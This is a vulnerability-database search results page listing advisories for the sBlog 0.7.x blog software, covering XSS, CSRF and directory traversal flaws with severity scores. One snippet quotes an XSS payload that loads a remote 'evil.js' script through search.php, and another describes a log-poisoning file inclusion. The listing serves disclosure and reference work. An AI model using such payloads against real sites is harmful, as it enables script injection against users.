CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

No description provided by source. source: http://www.securityfocus.com/bid/17044/info sBlog is prone to HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•8 views

sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS

7.1AI score

Exploits0

NVD•added 2007/11/05 6:46 p.m.•9 views

CVE-2007-5818

Cross-site request forgery CSRF vulnerability in blockseditdo.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...

7.6CVSS7AI score0.00391EPSS

Exploits0References5

Prion•added 2007/11/05 6:46 p.m.•7 views

Cross site request forgery (csrf)

Cross-site request forgery CSRF vulnerability in blockseditdo.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...

7.6CVSS7.5AI score0.00391EPSS

Exploits0References5Affected Software1

CVE•added 2007/11/05 6:0 p.m.•33 views

CVE-2007-5818

The vulnerability affects sBlog 0.7.3 Beta, specifically the blocks_edit_do.php handler, where a cross-site request forgery (CSRF) could allow an attacker to change arbitrary blocks as an administrator. The description states the risk as enabling an attacker to perform admin-level changes via CSR...

7.6CVSS7AI score0.00391EPSS

Exploits0References5Affected Software1

Cvelist•added 2007/11/05 6:0 p.m.•14 views

CVE-2007-5818

Cross-site request forgery CSRF vulnerability in blockseditdo.php in sBlog 0.7.3 Beta allows remote attackers to change arbitrary blocks as administrators...

7AI score0.00391EPSS

Exploits0References5

securityvulns•added 2007/11/02 12:0 a.m.•58 views

sBlog 0.7.3 Beta Cross Site Request Forgery

!-- - Product : sBlog - - Version : 0.7.3 Beta - - Website : http://www.sblog.se - - Author : 0x90 - - Homepage: WwW.0x90.CoM.Ar - - Contact : Gunsat0x90dotcomdotar - - Problem : Cross Site Request Forgery Vulnerability - - Sumary : sBlog has, by default, no CSRF protection, this may allow an...

0.6AI score

Exploits0

NVD•added 2007/07/31 10:17 a.m.•10 views

CVE-2007-4102

Cross-site scripting XSS vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/ sequence in the search string...

4.3CVSS5.8AI score0.00333EPSS

Exploits1References4

Prion•added 2007/07/31 10:17 a.m.•15 views

Cross site scripting

Cross-site scripting XSS vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/ sequence in the search string...

4.3CVSS6.2AI score0.00333EPSS

Exploits1References4Affected Software1

CVE•added 2007/07/31 10:0 a.m.•48 views

CVE-2007-4102

The CVE-2007-4102 entry describes a Cross-site Scripting (XSS) flaw in sBlog 0.7.3 Beta, specifically in search.php. The vulnerability allows remote attackers to inject arbitrary HTML and script via a leading '"/> sequence in the search string. Impact is stated as HTML/script injection without...

4.3CVSS5.8AI score0.00333EPSS

Exploits1References4Affected Software1

Packet Storm•added 2007/07/28 12:0 a.m.•18 views

sblog073-xss.txt

sBlog 0.7.3 Beta XSS Vulnerabilitie Found by 0x90 www.0x90.com.ar msn & mail: [email protected] in blog http://host/blog/search.php use '"/ Welcome to the jungle!...

7.4AI score

Exploits0

securityvulns•added 2007/07/27 12:0 a.m.•38 views

sBlog 0.7.3 Beta XSS Vulnerabilitie

sBlog 0.7.3 Beta XSS Vulnerabilitie Found by 0x90 www.0x90.com.ar msn & mail: [email protected] in blog http://host/blog/search.php use "//script src=http://yoursite.com/evil.js Welcome to the jungle!...

0.1AI score

Exploits0

Prion•added 2007/04/02 11:19 p.m.•11 views

Directory traversal

Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. dot dot in the conflangdefault parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by...

7.5CVSS7.6AI score0.0721EPSS

Exploits1References4Affected Software1

NVD•added 2007/04/02 11:19 p.m.•15 views

CVE-2007-1801

7.5CVSS7.2AI score0.0721EPSS

Exploits1References4

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by